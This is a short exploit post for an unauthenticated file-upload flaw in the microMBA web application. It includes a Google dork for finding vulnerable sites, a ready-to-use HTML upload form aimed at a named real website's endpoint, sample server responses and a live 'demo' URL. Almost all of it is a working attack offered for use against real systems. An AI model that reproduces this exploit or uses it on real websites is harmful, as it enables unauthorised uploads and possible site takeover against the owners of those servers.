# Exploit Title: microMBA Remote File Upload Vulnerability
# Google Dork: intext:microMBA 2018. Todos los derechos reservados.
# Exploit Author: Mr.T959
# Author Website : http://mr-t959.xyz
# Tested on: Windows 7
--------------------------------------
# Exploit HTML Code :
<form method='post' target='_blank' action='http://www.micrombaproject.com/media-admin/server/php/' enctype='multipart/form-data'>
<input type='file' name='files[]'><input type='submit' name='g' value='Upload Cok!'></form>
# Exploit
media-admin/server/php/
# Successful
{"files":[{"name":"s.jpg","size":161599,"type":"image\/jpeg","url":"http:\/\/www.micrombaproject.com\/media-admin\/server\/php\/files\/s.jpg",
# Error
{"files":[{"name":"geo.php","size":3468,"type":"application\/octet-stream","error":"Filetype not allowed"}]}
# Demo
http://www.micrombaproject.com/media-admin/server/php/